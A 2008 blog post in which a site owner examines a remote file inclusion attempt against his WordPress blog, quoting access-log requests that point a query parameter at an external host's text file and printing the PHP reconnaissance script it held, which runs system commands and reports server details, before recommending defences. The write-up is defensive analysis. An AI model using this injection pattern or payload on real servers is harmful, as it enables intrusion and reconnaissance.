Wordpress hack

One day I felt the need for visitors insight on this blog. In the immense list of available plugins I chose StatPress. Very nice and all kind of nice-too-knows popped up in the admin. Amongst three thingy entries too like:

July 10, 2008	02:06:36	218.38.18.31	_SERVER[SCRIPT_FILENAME]=http:...	Windows 2000

Mmm, probably a scriptannak with to much time on its hands. However this needs more investigation … in my logs I found the complete requests:

218.38.18.31 - - [10/Jul/2008:02:06:33 +0200] "GET /2008/07/multiple-unlimited-php-versions-on-an-single-debian-apache-server/?_SERVER[SCRIPT_FILENAME]=http://test12356.altervista.org/id.txt? HTTP/1.1" 200 9638 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
218.38.18.31 - - [10/Jul/2008:02:06:34 +0200] "GET /?_SERVER[SCRIPT_FILENAME]=http://test12356.altervista.org/id.txt? HTTP/1.1" 200 54974 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
218.38.18.31 - - [10/Jul/2008:02:06:35 +0200] "GET /2008/07/?_SERVER[SCRIPT_FILENAME]=http://test12356.altervista.org/id.txt? HTTP/1.1" 200 18301 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"

Ok, statpress is accurate about that :) For those who don´t know: Windows 2000 actually is NT5.0, afterall its the successor of Windows NT(New Technology) 4.0, which is the successor of Windows for Workgroups 3.x etc. So Windows Server 2003 is basically NT5.2.. I wonder how Windows Server 2008 is called….

Anyways, an GET request from altervista.org/id.txt dumped in ?_SERVER[SCRIPT_FILENAME] … if I´am correct this should be parsed by an php server as $_SERVER[SCRIPT_FILENAME] generating a warning or notice complaining about an assumed constant SCRIPT_FILENAME which will be set as altervista.org/id.txt?.. and supposedly including and parsing this id.txt thingie?? That is if register globals is set…right??

Let´s get this file with lynx http://test12356.altervista.org/id.txt?

< ? php
function ConvertBytes($number)
{
        $len = strlen($number);
        if($len < 4)
        {
                return sprintf("%d b", $number);
        }
        if($len >= 4 && $len <=6)
        {
                return sprintf("%0.2f Kb", $number/1024);
        }
        if($len >= 7 && $len <=9)
        {
                return sprintf("%0.2f Mb", $number/1024/1024);
        }

        return sprintf("%0.2f Gb", $number/1024/1024/1024);

}

echo "kungkang“;
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv(”SERVER_SOFTWARE”);
$php1 = phpversion();
$name1 = $_SERVER[’SERVER_NAME’];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo “kungkang was here ..“;
echo “uname -a: $un“;
echo “os: $os“;
echo “uptime: $up“;
echo “id: $id1“;
echo “pwd: $pwd1“;
echo “php: $php1“;
echo “software: $sof1“;
echo “server-name: $name1“;
echo “server-ip: $ip1“;
echo “free: $free“;
echo “used: $used“;
echo “total: $all“;
exit;

Look’s like a real phpinfo() ;) doesnt look too harmfull but Wordpress and Joomla should both be targets.. It does look outdated aswell cause I couldn´t get this thing to work, even with gobals registered. The output it should have generated:

kungkang
304:25:03 up 32100 days, 8:59, 254 users, load average: 28.05, 45.15, 44.21 uid=651(nt5-iis) gid=651(nt5-iis) groups=651(nt5-iis) kungkang was here ..
uname -a: Fedora blog.virtec.org 2.2.18-5-%86-bigmem #1 SMP Tue Dec 18 22:34:10 UTC 2007 i686
os: Linux
uptime: 304:25:03 up 32100 days, 8:59, 254 users, load average: 28.05, 45.15, 44.21
id: uid=651(nt5-iis) gid=651(nt5-iis) groups=651(nt5-iis)
pwd: /var/htdocs/www/publish_http/
php: 5.0.6-0.FC.3
software: Apache
server-name: blog.virtec.org
server-ip:
free: 346128.63 Gb
used: 16342.80 Gb
total: 234591.44 Gb

This guys seems to be from indonesia and has a nice tag on http://www.strenna online.com/. I can advise you to disable javascripting before visiting.. however you wont be able to view his animation.

More information: whois strenna online.com

There are a million ways to inject everything into anything… and it will always be that way. If you´re looking for some protection checkout:

http://www.modsecurity.org/
ModSecurity is a web application firewall that can work either embedded or as a reverse proxy. It provides protection from a range of attacks against web applications and allows for HTTP traffic monitoring, logging and real-time analysis.

http://www.phpwact.org/security/attack/catalog?s=script%20filename%20injection
A Catalog of Security Attacks: Methods of attacking a web application from the attackers perspective and how to prevent each attack from the application developers perspective.

July 10th, 2008 - Posted in thingies | |

2 Responses to ' Wordpress hack '

Subscribe to comments with RSS or TrackBack to ' Wordpress hack '.

  1. fitoemisee said,

    on September 28th, 2008 at 9:39 pm

    favorited this one, bro

  2. trargecraree said,

    on October 9th, 2008 at 10:25 am

    thank you, brother

Leave a reply